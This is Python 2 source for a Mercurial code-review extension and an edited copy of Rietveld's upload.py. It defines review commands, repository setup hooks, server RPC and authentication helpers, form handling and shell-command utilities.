	cl, err = LoadCL(ui, repo, name, web=True)
	if err != "":
		raise hg_util.Abort(err)
	if not cl.local:
		raise hg_util.Abort("cannot upload non-local change")
	cl.Upload(ui, repo)
	print "%s%s\n" % (server_url_base, cl.name)
	return 0
#######################################################################
# Table of commands, supplied to Mercurial for installation.
# Options shared by the commands that send review mail (mail, submit).
review_opts = [
	('r', 'reviewer', '', 'add reviewer'),
	('', 'cc', '', 'add cc'),
	('', 'tbr', '', 'add future reviewer'),
	('m', 'message', '', 'change description (for new change)'),
]
# Mercurial command table: command name -> (function, option list, synopsis).
cmdtable = {
	# The ^ means to show this command in the help text that
	# is printed when running hg with no arguments.
	"^change": (
		change,
		[
			('d', 'delete', None, 'delete existing change list'),
			('D', 'deletelocal', None, 'delete locally, but do not change CL on server'),
			('i', 'stdin', None, 'read change list from standard input'),
			('o', 'stdout', None, 'print change list to standard output'),
			('p', 'pending', None, 'print pending summary to standard output'),
		],
		"[-d | -D] [-i] [-o] change# or FILE ..."
	),
	"^clpatch": (
		clpatch,
		[
			('', 'ignore_hgapplydiff_failure', None, 'create CL metadata even if hgapplydiff fails'),
			('', 'no_incoming', None, 'disable check for incoming changes'),
		],
		"change#"
	),
	# Would prefer to call this codereview-login, but then
	# hg help codereview prints the help for this command
	# instead of the help for the extension.
	"code-login": (
		code_login,
		[],
		"",
	),
	"^download": (
		download,
		[],
		"change#"
	),
	"^file": (
		file,
		[
			('d', 'delete', None, 'delete files from change list (but not repository)'),
		],
		"[-d] change# FILE ..."
	),
	"^gofmt": (
		gofmt,
		[
			('l', 'list', None, 'list files that would change, but do not edit them'),
		],
		"FILE ..."
	),
	"^pending|p": (
		pending,
		[
			('s', 'short', False, 'show short result form'),
			('', 'quick', False, 'do not consult codereview server'),
		],
		"[FILE ...]"
	),
	"^ps": (
		ps,
		[],
		"[FILE ...]"
	),
	"^pq": (
		pq,
		[],
		"[FILE ...]"
	),
	"^mail": (
		mail,
		review_opts + [
		] + hg_commands.walkopts,
		"[-r reviewer] [--cc cc] [change# | file ...]"
	),
	"^release-apply": (
		release_apply,
		[
			('', 'ignore_hgapplydiff_failure', None, 'create CL metadata even if hgapplydiff fails'),
			('', 'no_incoming', None, 'disable check for incoming changes'),
		],
		"change#"
	),
	# TODO: release-start, release-tag, weekly-tag
	"^submit": (
		submit,
		review_opts + [
			('', 'no_incoming', None, 'disable initial incoming check (for testing)'),
		] + hg_commands.walkopts + hg_commands.commitopts + hg_commands.commitopts2,
		"[-r reviewer] [--cc cc] [change# | file ...]"
	),
	"^sync": (
		sync,
		[
			('', 'local', None, 'do not pull changes from remote repository')
		],
		"[--local]",
	),
	"^undo": (
		undo,
		[
			('', 'ignore_hgapplydiff_failure', None, 'create CL metadata even if hgapplydiff fails'),
			('', 'no_incoming', None, 'disable check for incoming changes'),
		],
		"change#"
	),
	"^upload": (
		upload,
		[],
		"change#"
	),
}
#######################################################################
# Mercurial extension initialization
# Installed over repo.rollback in reposetup; rollback would delete a commit,
# which this extension forbids (use hg undo instead).
def norollback(*pats, **opts):
	"""(disabled when using this extension)"""
	raise hg_util.Abort("codereview extension enabled; use undo instead of rollback")
codereview_init = False	# set once reposetup has run; later calls are no-ops
def reposetup(ui, repo):
	"""Mercurial extension hook: configure code review support for repo."""
	global codereview_disabled
	global defaultcc
	# reposetup gets called both for the local repository
	# and also for any repository we are pulling or pushing to.
	# Only initialize the first time.
	global codereview_init
	if codereview_init:
		return
	codereview_init = True
	start_status_thread()
	# Read repository-specific options from lib/codereview/codereview.cfg or codereview.cfg.
	root = ''
	try:
		root = repo.root
	except:
		# Yes, repo might not have root; see issue 959.
		codereview_disabled = 'codereview disabled: repository has no root'
		return
	repo_config_path = ''
	p1 = root + '/lib/codereview/codereview.cfg'
	p2 = root + '/codereview.cfg'
	if os.access(p1, os.F_OK):
		repo_config_path = p1
	else:
		repo_config_path = p2
	try:
		f = open(repo_config_path)
		for line in f:
			if line.startswith('defaultcc:'):
				defaultcc = SplitCommaSpace(line[len('defaultcc:'):])
			if line.startswith('contributors:'):
				global contributorsURL
				contributorsURL = line[len('contributors:'):].strip()
	except:
		# Without a config file the extension stays disabled.
		codereview_disabled = 'codereview disabled: cannot open ' + repo_config_path
		return
	remote = ui.config("paths", "default", "")
	if remote.find("://") < 0:
		raise hg_util.Abort("codereview: default path '%s' is not a URL" % (remote,))
	InstallMatch(ui, repo)
	RietveldSetup(ui, repo)
	# Disable the Mercurial commands that might change the repository.
	# Only commands in this extension are supposed to do that.
	ui.setconfig("hooks", "precommit.codereview", precommithook)
	# Rollback removes an existing commit. Don't do that either.
	global real_rollback
	real_rollback = repo.rollback
	repo.rollback = norollback
#######################################################################
# Wrappers around upload.py for interacting with Rietveld
from HTMLParser import HTMLParser
# HTML form parser
class FormParser(HTMLParser):
	"""Collects HTML form field values: <input> name/value pairs and
	<textarea> contents, accumulated into self.map (name -> value)."""
	def __init__(self):
		self.map = {}	# field name -> field value
		self.curtag = None	# name of the currently open <textarea>, if any
		self.curdata = None	# text accumulated for that textarea
		HTMLParser.__init__(self)
	def handle_starttag(self, tag, attrs):
		if tag == "input":
			key = None
			value = ''
			for a in attrs:
				if a[0] == 'name':
					key = a[1]
				if a[0] == 'value':
					value = a[1]
			if key is not None:
				self.map[key] = value
		if tag == "textarea":
			key = None
			for a in attrs:
				if a[0] == 'name':
					key = a[1]
			if key is not None:
				# Start collecting character data until the matching end tag.
				self.curtag = key
				self.curdata = ''
	def handle_endtag(self, tag):
		if tag == "textarea" and self.curtag is not None:
			self.map[self.curtag] = self.curdata
			self.curtag = None
			self.curdata = None
	def handle_charref(self, name):
		# Numeric character reference, e.g. &#65;
		self.handle_data(unichr(int(name)))
	def handle_entityref(self, name):
		# Named entity, e.g. &amp;; unknown entities pass through verbatim.
		import htmlentitydefs
		if name in htmlentitydefs.entitydefs:
			self.handle_data(htmlentitydefs.entitydefs[name])
		else:
			self.handle_data("&" + name + ";")
	def handle_data(self, data):
		if self.curdata is not None:
			self.curdata += data
def JSONGet(ui, path):
	"""Fetch path from the server and return the decoded, normalized JSON.
	Returns None (after printing a warning) on any failure."""
	try:
		data = MySend(path, force_auth=False)
		typecheck(data, str)
		d = fix_json(json.loads(data))
	except:
		# Deliberate best effort: warn and return None rather than aborting.
		ui.warn("JSONGet %s: %s\n" % (path, ExceptionDetail()))
		return None
	return d
# Clean up json parser output to match our expectations:
# * all strings are UTF-8-encoded str, not unicode.
# * missing fields are missing, not None,
# so that d.get("foo", defaultvalue) works.
def fix_json(x):
	"""Recursively normalize a json.loads result (see comment above):
	encode unicode as UTF-8 str, drop dict entries whose value is None."""
	if type(x) in [str, int, float, bool, type(None)]:
		pass
	elif type(x) is unicode:
		x = x.encode("utf-8")
	elif type(x) is list:
		for i in range(len(x)):
			x[i] = fix_json(x[i])
	elif type(x) is dict:
		todel = []
		for k in x:
			if x[k] is None:
				todel.append(k)	# collect first; can't delete while iterating
			else:
				x[k] = fix_json(x[k])
		for k in todel:
			del x[k]
	else:
		raise hg_util.Abort("unknown type " + str(type(x)) + " in fix_json")
	if type(x) is str:
		x = x.replace('\r\n', '\n')
	return x
def IsRietveldSubmitted(ui, clname, hex):
	"""Report whether the Rietveld issue clname records being submitted
	as a changeset whose hash matches hex.

	Scans the issue's messages for the "*** Submitted as ... ***" text
	that submit() posts, and requires at least 8 hex digits of the
	recorded hash to be a prefix of hex.
	"""
	# Renamed the local from "dict" (original) to avoid shadowing the builtin.
	issue = JSONGet(ui, "/api/" + clname + "?messages=true")
	if issue is None:
		return False
	for msg in issue.get("messages", []):
		text = msg.get("text", "")
		m = re.match(r'\*\*\* Submitted as [^*]*?([0-9a-f]+) \*\*\*', text)
		if m is not None and len(m.group(1)) >= 8 and hex.startswith(m.group(1)):
			return True
	return False
def IsRietveldMailed(cl):
	"""Report whether review mail has already been sent for cl's issue."""
	# Rietveld records the review request as an issue message with this phrase.
	needle = "I'd like you to review this change"
	return any(needle in msg.get("text", "") for msg in cl.dict.get("messages", []))
def DownloadCL(ui, repo, clname):
	"""Download CL metadata and its newest patch from the codereview server.
	Returns (cl, vers, diffdata, err); err is "" on success."""
	set_status("downloading CL " + clname)
	cl, err = LoadCL(ui, repo, clname, web=True)
	if err != "":
		return None, None, None, "error loading CL %s: %s" % (clname, err)
	# Find most recent diff
	diffs = cl.dict.get("patchsets", [])
	if not diffs:
		return None, None, None, "CL has no patch sets"
	patchid = diffs[-1]
	patchset = JSONGet(ui, "/api/" + clname + "/" + str(patchid))
	if patchset is None:
		return None, None, None, "error loading CL patchset %s/%d" % (clname, patchid)
	if patchset.get("patchset", 0) != patchid:
		return None, None, None, "malformed patchset information"
	# Extract the base revision from the patchset message ("diff -r REV ...").
	vers = ""
	msg = patchset.get("message", "").split()
	if len(msg) >= 3 and msg[0] == "diff" and msg[1] == "-r":
		vers = msg[2]
	diff = "/download/issue" + clname + "_" + str(patchid) + ".diff"
	diffdata = MySend(diff, force_auth=False)
	# Print warning if email is not in CONTRIBUTORS file.
	email = cl.dict.get("owner_email", "")
	if not email:
		return None, None, None, "cannot find owner for %s" % (clname)
	him = FindContributor(ui, repo, email)
	me = FindContributor(ui, repo, None)
	if him == me:
		# Downloading my own CL: remember whether mail was already sent.
		cl.mailed = IsRietveldMailed(cl)
	else:
		# Someone else's CL: record the original author.
		cl.copied_from = email
	return cl, vers, diffdata, ""
def MySend(request_path, payload=None,
		content_type="application/octet-stream",
		timeout=None, force_auth=True,
		**kwargs):
	"""Run MySend1 maybe twice, because Rietveld is unreliable."""
	try:
		return MySend1(request_path, payload, content_type, timeout, force_auth, **kwargs)
	except Exception, e:
		if type(e) != urllib2.HTTPError or e.code != 500: # only retry on HTTP 500 error
			raise
		print >>sys.stderr, "Loading "+request_path+": "+ExceptionDetail()+"; trying again in 2 seconds."
		time.sleep(2)
		# Single retry; a second 500 propagates to the caller.
		return MySend1(request_path, payload, content_type, timeout, force_auth, **kwargs)
# Like upload.py Send but only authenticates when the
# redirect is to www.google.com/accounts. This keeps
# unnecessary redirects from happening during testing.
def MySend1(request_path, payload=None,
		content_type="application/octet-stream",
		timeout=None, force_auth=True,
		**kwargs):
	"""Sends an RPC and returns the response.
	Args:
		request_path: The path to send the request to, eg /api/appversion/create.
		payload: The body of the request, or None to send an empty request.
		content_type: The Content-Type header to use.
		timeout: timeout in seconds; default None i.e. no timeout.
			(Note: for large requests on OS X, the timeout doesn't work right.)
		kwargs: Any keyword arguments are converted into query string parameters.
	Returns:
		The response body, as a string.
	"""
	# TODO: Don't require authentication. Let the server say
	# whether it is necessary.
	global rpc
	if rpc == None:
		rpc = GetRpcServer(upload_options)	# lazily create the shared RPC server
	self = rpc
	if not self.authenticated and force_auth:
		self._Authenticate()
	if request_path is None:
		return
	if timeout is None:
		timeout = 30 # seconds
	# The timeout is applied process-wide for the duration of the request.
	old_timeout = socket.getdefaulttimeout()
	socket.setdefaulttimeout(timeout)
	try:
		tries = 0
		while True:
			tries += 1
			args = dict(kwargs)
			url = "https://%s%s" % (self.host, request_path)
			if args:
				url += "?" + urllib.urlencode(args)
			req = self._CreateRequest(url=url, data=payload)
			req.add_header("Content-Type", content_type)
			try:
				f = self.opener.open(req)
				response = f.read()
				f.close()
				# Translate \r\n into \n, because Rietveld doesn't.
				response = response.replace('\r\n', '\n')
				# who knows what urllib will give us
				if type(response) == unicode:
					response = response.encode("utf-8")
				typecheck(response, str)
				return response
			except urllib2.HTTPError, e:
				if tries > 3:
					raise
				elif e.code == 401:
					self._Authenticate()
				elif e.code == 302:
					# Re-authenticate only for redirects to Google's
					# ServiceLogin; any other redirect is treated as an
					# empty response (keeps testing free of redirects).
					loc = e.info()["location"]
					if not loc.startswith('https://www.google.com/a') or loc.find('/ServiceLogin') < 0:
						return ''
					self._Authenticate()
				else:
					raise
	finally:
		socket.setdefaulttimeout(old_timeout)
def GetForm(url):
	"""Fetch url from the server and return its HTML form fields
	as a str->str dict with normalized line endings."""
	parser = FormParser()
	parser.feed(ustr(MySend(url))) # f.feed wants unicode
	parser.close()
	# convert back to utf-8 to restore sanity
	form = {}
	for key, value in parser.map.items():
		form[key.encode("utf-8")] = value.replace("\r\n", "\n").encode("utf-8")
	return form
def EditDesc(issue, subject=None, desc=None, reviewers=None, cc=None, closed=False, private=False):
	"""Update fields of the Rietveld issue via its /<issue>/edit form.
	Only non-None (or True, for the flags) arguments are changed;
	exits the process if the server rejects the edit."""
	set_status("uploading change to description")
	# Fetch the current form so unspecified fields round-trip unchanged.
	form_fields = GetForm("/" + issue + "/edit")
	if subject is not None:
		form_fields['subject'] = subject
	if desc is not None:
		form_fields['description'] = desc
	if reviewers is not None:
		form_fields['reviewers'] = reviewers
	if cc is not None:
		form_fields['cc'] = cc
	if closed:
		form_fields['closed'] = "checked"
	if private:
		form_fields['private'] = "checked"
	ctype, body = EncodeMultipartFormData(form_fields.items(), [])
	response = MySend("/" + issue + "/edit", body, content_type=ctype)
	if response != "":
		# A non-empty response is the server's error page.
		print >>sys.stderr, "Error editing description:\n" + "Sent form: \n", form_fields, "\n", response
		sys.exit(2)
def PostMessage(ui, issue, message, reviewers=None, cc=None, send_mail=True, subject=None):
	"""Post a message on the Rietveld issue, optionally updating the
	reviewer/CC lists and sending notification mail.
	Exits the process if the server rejects the post."""
	set_status("uploading message")
	form_fields = GetForm("/" + issue + "/publish")
	if reviewers is not None:
		form_fields['reviewers'] = reviewers
	if cc is not None:
		form_fields['cc'] = cc
	if send_mail:
		form_fields['send_mail'] = "checked"
	else:
		del form_fields['send_mail']
	if subject is not None:
		form_fields['subject'] = subject
	form_fields['message'] = message
	form_fields['message_only'] = '1' # Don't include draft comments
	if reviewers is not None or cc is not None:
		form_fields['message_only'] = '' # Must set '' in order to override cc/reviewer
	# NOTE(review): "applications/..." (with the trailing s) looks like a
	# typo for "application/x-www-form-urlencoded", but the server has
	# accepted it as-is; confirm before changing.
	ctype = "applications/x-www-form-urlencoded"
	body = urllib.urlencode(form_fields)
	response = MySend("/" + issue + "/publish", body, content_type=ctype)
	if response != "":
		print response
		sys.exit(2)
# Bare attribute container: RietveldSetup fills an instance with the
# fields upload.py expects on its parsed-options object.
class opt(object):
	pass
def RietveldSetup(ui, repo):
	"""Initialize the Rietveld/upload.py globals from Mercurial config."""
	global force_google_account
	global rpc
	global server
	global server_url_base
	global upload_options
	global verbosity
	if not ui.verbose:
		verbosity = 0
	# Config options.
	x = ui.config("codereview", "server")
	if x is not None:
		server = x
	# TODO(rsc): Take from ui.username?
	email = None
	x = ui.config("codereview", "email")
	if x is not None:
		email = x
	server_url_base = "https://" + server + "/"
	testing = ui.config("codereview", "testing")
	force_google_account = ui.configbool("codereview", "force_google_account", False)
	# Build the options object that GetRpcServer/upload.py expect.
	upload_options = opt()
	upload_options.email = email
	upload_options.host = None
	upload_options.verbose = 0
	upload_options.description = None
	upload_options.description_file = None
	upload_options.reviewers = None
	upload_options.cc = None
	upload_options.message = None
	upload_options.issue = None
	upload_options.download_base = False
	upload_options.revision = None
	upload_options.send_mail = False
	upload_options.vcs = None
	upload_options.server = server
	upload_options.save_cookies = True
	if testing:
		upload_options.save_cookies = False
		upload_options.email = "test@example.com"
	rpc = None
	# Remember the most recent release branch, if any (used by submit).
	global releaseBranch
	tags = repo.branchtags().keys()
	if 'release-branch.go10' in tags:
		# NOTE(rsc): This tags.sort is going to get the wrong
		# answer when comparing release-branch.go9 with
		# release-branch.go10. It will be a while before we care.
		raise hg_util.Abort('tags.sort needs to be fixed for release-branch.go10')
	tags.sort()
	for t in tags:
		if t.startswith('release-branch.go'):
			releaseBranch = t
#######################################################################
# http://codereview.appspot.com/static/upload.py, heavily edited.
#!/usr/bin/env python
#
# Copyright 2007 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tool for uploading diffs from a version control system to the codereview app.
Usage summary: upload.py [options] [-- diff_options]
Diff options are passed to the diff command of the underlying system.
Supported version control systems:
Git
Mercurial
Subversion
It is important for Git/Mercurial users to specify a tree/node/branch to diff
against by using the '--rev' option.
"""
# This code is derived from appcfg.py in the App Engine SDK (open source),
# and from ASPN recipe #146306.
import cookielib
import getpass
import logging
import mimetypes
import optparse
import os
import re
import socket
import subprocess
import sys
import urllib
import urllib2
import urlparse
# The md5 module was deprecated in Python 2.5.
try:
from hashlib import md5
except ImportError:
from md5 import md5
try:
import readline
except ImportError:
pass
# The logging verbosity:
#  0: Errors only.
#  1: Status messages.
#  2: Info logs.
#  3: Debug logs.
# (RietveldSetup lowers this to 0 unless hg runs with --verbose.)
verbosity = 1
# Max size of patch or base file.
MAX_UPLOAD_SIZE = 900 * 1024
# whitelist for non-binary filetypes which do not start with "text/"
# .mm (Objective-C) shows up as application/x-freemind on my Linux box.
TEXT_MIMETYPES = [
	'application/javascript',
	'application/x-javascript',
	'application/x-freemind'
]
def GetEmail(prompt):
	"""Prompts the user for their email address and returns it.
	The last used email address is saved to a file and offered up as a suggestion
	to the user. If the user presses enter without typing in anything the last
	used email address is used. If the user enters a new address, it is saved
	for next time we prompt.
	"""
	last_email_file_name = os.path.expanduser("~/.last_codereview_email_address")
	last_email = ""
	if os.path.exists(last_email_file_name):
		try:
			last_email_file = open(last_email_file_name, "r")
			last_email = last_email_file.readline().strip("\n")
			last_email_file.close()
			prompt += " [%s]" % last_email
		except IOError, e:
			pass	# no readable saved address; prompt without a suggestion
	email = raw_input(prompt + ": ").strip()
	if email:
		try:
			last_email_file = open(last_email_file_name, "w")
			last_email_file.write(email)
			last_email_file.close()
		except IOError, e:
			pass	# saving is best effort; failure is not fatal
	else:
		email = last_email
	return email
def StatusUpdate(msg):
	"""Print a status message to stdout.
	If 'verbosity' is greater than 0, print the message.
	Args:
		msg: The string to print.
	"""
	if verbosity > 0:
		print msg
def ErrorExit(msg):
	"""Print an error message to stderr and exit with status 1."""
	print >>sys.stderr, msg
	sys.exit(1)
class ClientLoginError(urllib2.HTTPError):
	"""Raised to indicate there was an error authenticating with ClientLogin."""
	def __init__(self, url, code, msg, headers, args):
		urllib2.HTTPError.__init__(self, url, code, msg, headers, None)
		# args is the parsed ClientLogin response, e.g. {"Error": "BadAuthentication"}.
		self.args = args
		# .reason is now a read-only property based on .msg
		# this means we ignore 'msg', but that seems to work fine.
		self.msg = args["Error"]
class AbstractRpcServer(object):
	"""Provides a common interface for a simple RPC server."""
	def __init__(self, host, auth_function, host_override=None, extra_headers={}, save_cookies=False):
		"""Creates a new HttpRpcServer.
		Args:
			host: The host to send requests to.
			auth_function: A function that takes no arguments and returns an
				(email, password) tuple when called. Will be called if authentication
				is required.
			host_override: The host header to send to the server (defaults to host).
			extra_headers: A dict of extra headers to append to every request.
			save_cookies: If True, save the authentication cookies to local disk.
				If False, use an in-memory cookiejar instead. Subclasses must
				implement this functionality. Defaults to False.
		"""
		# NOTE(review): extra_headers has a mutable default; it is only
		# iterated here, never mutated, so the shared default is harmless.
		self.host = host
		self.host_override = host_override
		self.auth_function = auth_function
		self.authenticated = False
		self.extra_headers = extra_headers
		self.save_cookies = save_cookies
		self.opener = self._GetOpener()
		if self.host_override:
			logging.info("Server: %s; Host: %s", self.host, self.host_override)
		else:
			logging.info("Server: %s", self.host)
	def _GetOpener(self):
		"""Returns an OpenerDirector for making HTTP requests.
		Returns:
			A urllib2.OpenerDirector object.
		"""
		raise NotImplementedError()
	def _CreateRequest(self, url, data=None):
		"""Creates a new urllib request."""
		logging.debug("Creating request for: '%s' with payload:\n%s", url, data)
		req = urllib2.Request(url, data=data)
		if self.host_override:
			req.add_header("Host", self.host_override)
		for key, value in self.extra_headers.iteritems():
			req.add_header(key, value)
		return req
	def _GetAuthToken(self, email, password):
		"""Uses ClientLogin to authenticate the user, returning an auth token.
		Args:
			email: The user's email address
			password: The user's password
		Raises:
			ClientLoginError: If there was an error authenticating with ClientLogin.
			HTTPError: If there was some other form of HTTP error.
		Returns:
			The authentication token returned by ClientLogin.
		"""
		account_type = "GOOGLE"
		if self.host.endswith(".google.com") and not force_google_account:
			# Needed for use inside Google.
			account_type = "HOSTED"
		req = self._CreateRequest(
			url="https://www.google.com/accounts/ClientLogin",
			data=urllib.urlencode({
				"Email": email,
				"Passwd": password,
				"service": "ah",
				"source": "rietveld-codereview-upload",
				"accountType": account_type,
			}),
		)
		try:
			response = self.opener.open(req)
			response_body = response.read()
			# Response is key=value lines; we need the Auth token.
			response_dict = dict(x.split("=") for x in response_body.split("\n") if x)
			return response_dict["Auth"]
		except urllib2.HTTPError, e:
			if e.code == 403:
				# 403 carries a parseable Error=... body from ClientLogin.
				body = e.read()
				response_dict = dict(x.split("=", 1) for x in body.split("\n") if x)
				raise ClientLoginError(req.get_full_url(), e.code, e.msg, e.headers, response_dict)
			else:
				raise
	def _GetAuthCookie(self, auth_token):
		"""Fetches authentication cookies for an authentication token.
		Args:
			auth_token: The authentication token returned by ClientLogin.
		Raises:
			HTTPError: If there was an error fetching the authentication cookies.
		"""
		# This is a dummy value to allow us to identify when we're successful.
		continue_location = "http://localhost/"
		args = {"continue": continue_location, "auth": auth_token}
		req = self._CreateRequest("https://%s/_ah/login?%s" % (self.host, urllib.urlencode(args)))
		try:
			response = self.opener.open(req)
		except urllib2.HTTPError, e:
			response = e
		# Success manifests as a 302 redirect back to continue_location.
		if (response.code != 302 or
			response.info()["location"] != continue_location):
			raise urllib2.HTTPError(req.get_full_url(), response.code, response.msg, response.headers, response.fp)
		self.authenticated = True
	def _Authenticate(self):
		"""Authenticates the user.
		The authentication process works as follows:
		1) We get a username and password from the user
		2) We use ClientLogin to obtain an AUTH token for the user
			(see http://code.google.com/apis/accounts/AuthForInstalledApps.html).
		3) We pass the auth token to /_ah/login on the server to obtain an
			authentication cookie. If login was successful, it tries to redirect
			us to the URL we provided.
		If we attempt to access the upload API without first obtaining an
		authentication cookie, it returns a 401 response (or a 302) and
		directs us to authenticate ourselves with ClientLogin.
		"""
		# Up to three attempts for a bad password; other ClientLogin
		# errors print a diagnostic and give up (or re-raise).
		for i in range(3):
			credentials = self.auth_function()
			try:
				auth_token = self._GetAuthToken(credentials[0], credentials[1])
			except ClientLoginError, e:
				if e.msg == "BadAuthentication":
					print >>sys.stderr, "Invalid username or password."
					continue
				if e.msg == "CaptchaRequired":
					print >>sys.stderr, (
						"Please go to\n"
						"https://www.google.com/accounts/DisplayUnlockCaptcha\n"
						"and verify you are a human. Then try again.")
					break
				if e.msg == "NotVerified":
					print >>sys.stderr, "Account not verified."
					break
				if e.msg == "TermsNotAgreed":
					print >>sys.stderr, "User has not agreed to TOS."
					break
				if e.msg == "AccountDeleted":
					print >>sys.stderr, "The user account has been deleted."
					break
				if e.msg == "AccountDisabled":
					print >>sys.stderr, "The user account has been disabled."
					break
				if e.msg == "ServiceDisabled":
					print >>sys.stderr, "The user's access to the service has been disabled."
					break
				if e.msg == "ServiceUnavailable":
					print >>sys.stderr, "The service is not available; try again later."
					break
				raise
			self._GetAuthCookie(auth_token)
			return
	def Send(self, request_path, payload=None,
			content_type="application/octet-stream",
			timeout=None,
			**kwargs):
		"""Sends an RPC and returns the response.
		Args:
			request_path: The path to send the request to, eg /api/appversion/create.
			payload: The body of the request, or None to send an empty request.
			content_type: The Content-Type header to use.
			timeout: timeout in seconds; default None i.e. no timeout.
				(Note: for large requests on OS X, the timeout doesn't work right.)
			kwargs: Any keyword arguments are converted into query string parameters.
		Returns:
			The response body, as a string.
		"""
		# TODO: Don't require authentication.  Let the server say
		# whether it is necessary.
		if not self.authenticated:
			self._Authenticate()
		old_timeout = socket.getdefaulttimeout()
		socket.setdefaulttimeout(timeout)
		try:
			tries = 0
			while True:
				tries += 1
				args = dict(kwargs)
				url = "https://%s%s" % (self.host, request_path)
				if args:
					url += "?" + urllib.urlencode(args)
				req = self._CreateRequest(url=url, data=payload)
				req.add_header("Content-Type", content_type)
				try:
					f = self.opener.open(req)
					response = f.read()
					f.close()
					return response
				except urllib2.HTTPError, e:
					if tries > 3:
						raise
					elif e.code == 401 or e.code == 302:
						# Session expired or missing; re-authenticate and retry.
						self._Authenticate()
					else:
						raise
		finally:
			socket.setdefaulttimeout(old_timeout)
class HttpRpcServer(AbstractRpcServer):
	"""Provides a simplified RPC-style interface for HTTP requests."""
	def _Authenticate(self):
		"""Save the cookie jar after authentication."""
		super(HttpRpcServer, self)._Authenticate()
		if self.save_cookies:
			StatusUpdate("Saving authentication cookies to %s" % self.cookie_file)
			self.cookie_jar.save()
	def _GetOpener(self):
		"""Returns an OpenerDirector that supports cookies and ignores redirects.
		Returns:
			A urllib2.OpenerDirector object.
		"""
		# Deliberately built by hand (no build_opener) so that no
		# HTTPRedirectHandler is installed: redirects surface as HTTPError.
		opener = urllib2.OpenerDirector()
		opener.add_handler(urllib2.ProxyHandler())
		opener.add_handler(urllib2.UnknownHandler())
		opener.add_handler(urllib2.HTTPHandler())
		opener.add_handler(urllib2.HTTPDefaultErrorHandler())
		opener.add_handler(urllib2.HTTPSHandler())
		opener.add_handler(urllib2.HTTPErrorProcessor())
		if self.save_cookies:
			self.cookie_file = os.path.expanduser("~/.codereview_upload_cookies_" + server)
			self.cookie_jar = cookielib.MozillaCookieJar(self.cookie_file)
			if os.path.exists(self.cookie_file):
				try:
					self.cookie_jar.load()
					self.authenticated = True
					StatusUpdate("Loaded authentication cookies from %s" % self.cookie_file)
				except (cookielib.LoadError, IOError):
					# Failed to load cookies - just ignore them.
					pass
			else:
				# Create an empty cookie file with mode 600
				fd = os.open(self.cookie_file, os.O_CREAT, 0600)
				os.close(fd)
			# Always chmod the cookie file
			os.chmod(self.cookie_file, 0600)
		else:
			# Don't save cookies across runs of update.py.
			self.cookie_jar = cookielib.CookieJar()
		opener.add_handler(urllib2.HTTPCookieProcessor(self.cookie_jar))
		return opener
def GetRpcServer(options):
    """Returns an instance of an AbstractRpcServer.

    Args:
      options: Parsed command-line options; this reads options.server,
        options.host, options.email and options.save_cookies.

    Returns:
      A new AbstractRpcServer, on which RPC calls can be made.
    """
    rpc_server_class = HttpRpcServer

    def GetUserCredentials():
        """Prompts the user for a username and password."""
        # Disable status prints so they don't obscure the password prompt.
        global global_status
        st = global_status
        global_status = None
        email = options.email
        if email is None:
            email = GetEmail("Email (login for uploading to %s)" % options.server)
        password = getpass.getpass("Password for %s: " % email)
        # Put status back.
        global_status = st
        return (email, password)

    # If this is the dev_appserver, use fake authentication.
    host = (options.host or options.server).lower()
    if host == "localhost" or host.startswith("localhost:"):
        email = options.email
        if email is None:
            email = "test@example.com"
            logging.info("Using debug user %s. Override with --email" % email)
        # The dev_appserver accepts a magic cookie instead of real credentials.
        server = rpc_server_class(
            options.server,
            lambda: (email, "password"),
            host_override=options.host,
            extra_headers={"Cookie": 'dev_appserver_login="%s:False"' % email},
            save_cookies=options.save_cookies)
        # Don't try to talk to ClientLogin.
        server.authenticated = True
        return server
    return rpc_server_class(options.server, GetUserCredentials,
                            host_override=options.host, save_cookies=options.save_cookies)
def EncodeMultipartFormData(fields, files):
    """Encode form fields for multipart/form-data.

    Args:
      fields: A sequence of (name, value) elements for regular form fields.
      files: A sequence of (name, filename, value) elements for data to be
        uploaded as files.
    Returns:
      (content_type, body) ready for httplib.HTTP instance.
    Source:
      http://aspn.activestate.com/ASPN/Cookbook/Python/Recipe/146306
    """
    BOUNDARY = '-M-A-G-I-C---B-O-U-N-D-A-R-Y-'
    CRLF = '\r\n'
    parts = []
    # Plain form fields: a disposition header, a blank line, then the value.
    for (name, value) in fields:
        typecheck(name, str)
        typecheck(value, str)
        parts.extend([
            '--' + BOUNDARY,
            'Content-Disposition: form-data; name="%s"' % name,
            '',
            value,
        ])
    # File payloads additionally carry a filename and a guessed content type.
    for (name, filename, value) in files:
        typecheck(name, str)
        typecheck(filename, str)
        typecheck(value, str)
        parts.extend([
            '--' + BOUNDARY,
            'Content-Disposition: form-data; name="%s"; filename="%s"' % (name, filename),
            'Content-Type: %s' % GetContentType(filename),
            '',
            value,
        ])
    # Closing boundary plus a trailing CRLF.
    parts.append('--' + BOUNDARY + '--')
    parts.append('')
    content_type = 'multipart/form-data; boundary=%s' % BOUNDARY
    return content_type, CRLF.join(parts)
def GetContentType(filename):
    """Guess the MIME content type from *filename*, defaulting to octet-stream."""
    guessed, _ = mimetypes.guess_type(filename)
    return guessed if guessed else 'application/octet-stream'
# Use a shell for subcommands on Windows to get a PATH search.
# (subprocess on Windows only searches PATH when shell=True.)
use_shell = sys.platform.startswith("win")
def RunShellWithReturnCode(command, print_output=False,
                           universal_newlines=True, env=os.environ):
    """Executes a command and returns the output from stdout and the return code.

    Args:
      command: Command to execute.
      print_output: If True, the output is printed to stdout.
        If False, both stdout and stderr are ignored.
      universal_newlines: Use universal_newlines flag (default: True).
      env: Environment mapping for the subprocess (default: os.environ).

    Returns:
      Tuple (output, return code)
    """
    logging.info("Running %s", command)
    p = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE,
                         shell=use_shell, universal_newlines=universal_newlines, env=env)
    if print_output:
        # Echo stdout line by line while the command runs, collecting a copy.
        output_array = []
        while True:
            line = p.stdout.readline()
            if not line:
                break
            print line.strip("\n")
            output_array.append(line)
        output = "".join(output_array)
    else:
        output = p.stdout.read()
    p.wait()
    # stderr is read only after the process exits; it is echoed only in
    # print_output mode, otherwise silently dropped.
    errout = p.stderr.read()
    if print_output and errout:
        print >>sys.stderr, errout
    p.stdout.close()
    p.stderr.close()
    return output, p.returncode
